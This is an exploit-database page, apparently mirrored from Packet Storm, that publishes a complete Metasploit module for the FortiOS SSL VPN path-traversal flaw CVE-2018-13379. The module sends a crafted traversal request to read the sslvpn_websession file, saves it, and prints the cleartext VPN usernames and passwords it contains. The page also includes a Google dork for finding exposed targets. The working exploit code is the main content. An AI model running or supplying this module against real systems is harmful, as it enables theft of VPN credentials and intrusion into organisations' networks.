Lucene search
K

FortiOS 5.6.7 / 6.0.4 Credential Disclosure

🗓️ 19 Aug 2019 00:00:00Reported by Carlos E. VieiraType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 478 Views

FortiOS system file leak through SSL VPN allows reading login/passwords in clear tex

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Path Traversal in Fortinet Fortiproxy
14 Dec 202012:17
githubexploit
GithubExploit
Exploit for Path Traversal in Fortinet Fortiproxy
11 Aug 201909:44
githubexploit
GithubExploit
Exploit for Path Traversal in Fortinet Fortiproxy
23 May 202613:25
githubexploit
GithubExploit
Exploit for Server-Side Request Forgery in Microsoft
27 Jan 202611:39
githubexploit
GithubExploit
MCATester
24 Jun 202605:32
githubexploit
GithubExploit
Exploit for Path Traversal in Fortinet Fortiproxy
5 Feb 202619:12
githubexploit
GithubExploit
FortiGate-FortiWeb-Multi-Exploit-Extractor
14 May 202614:07
githubexploit
GithubExploit
Exploit for Path Traversal in Vmware Cloud_Foundation
27 Jan 202612:00
githubexploit
GithubExploit
Exploit for Path Traversal in Fortinet Fortiproxy
30 Nov 202008:39
githubexploit
GithubExploit
Exploit for Path Traversal in Fortinet Fortiproxy
19 Nov 202021:22
githubexploit
Rows per page
`# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text.  
# Google Dork: intext:"Please Login" inurl:"/remote/login"  
# Date: 17/08/2019  
# Exploit Author: Carlos E. Vieira  
# Vendor Homepage: https://www.fortinet.com/  
# Software Link: https://www.fortinet.com/products/fortigate/fortios.html  
# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).  
# Tested on: 5.6.6  
# CVE : CVE-2018-13379  
  
require 'msf/core'  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Post::File   
def initialize(info = {})  
super(update_info(info,  
'Name' => 'SSL VPN FortiOs - System file leak',  
'Description' => %q{  
FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests.  
This exploit read /dev/cmdb/sslvpn_websession file, this file contains login and passwords in (clear/text).  
This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).  
},  
'References' =>  
[  
[ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379' ]  
],  
'Author' => [ 'lynx (Carlos Vieira)' ],  
'License' => MSF_LICENSE,  
'DefaultOptions' =>  
{  
'RPORT' => 443,  
'SSL' => true  
},  
))  
  
end  
  
  
def run()  
print_good("Checking target...")  
res = send_request_raw({'uri'=>'/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'})  
  
if res && res.code == 200  
print_good("Target is Vulnerable!")  
data = res.body  
current_host = datastore['RHOST']  
filename = "msf_sslwebsession_"+current_host+".bin"  
File.delete(filename) if File.exist?(filename)  
file_local_write(filename, data)  
print_good("Parsing binary file.......")  
parse()  
else  
if(res && res.code == 404)  
print_error("Target not Vulnerable")  
else  
print_error("Ow crap, try again...")  
end  
end  
end  
def parse()  
current_host = datastore['RHOST']  
  
fileObj = File.new("msf_sslwebsession_"+current_host+".bin", "r")  
words = 0  
while (line = fileObj.gets)  
printable_data = line.gsub(/[^[:print:]]/, '.')  
array_data = printable_data.scan(/.{1,60}/m)  
for ar in array_data  
if ar != "............................................................"  
print_good(ar)  
end  
end  
#print_good(printable_data)  
  
end   
fileObj.close   
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Aug 2019 00:00Current
10High risk
Vulners AI Score10
EPSS0.99999
478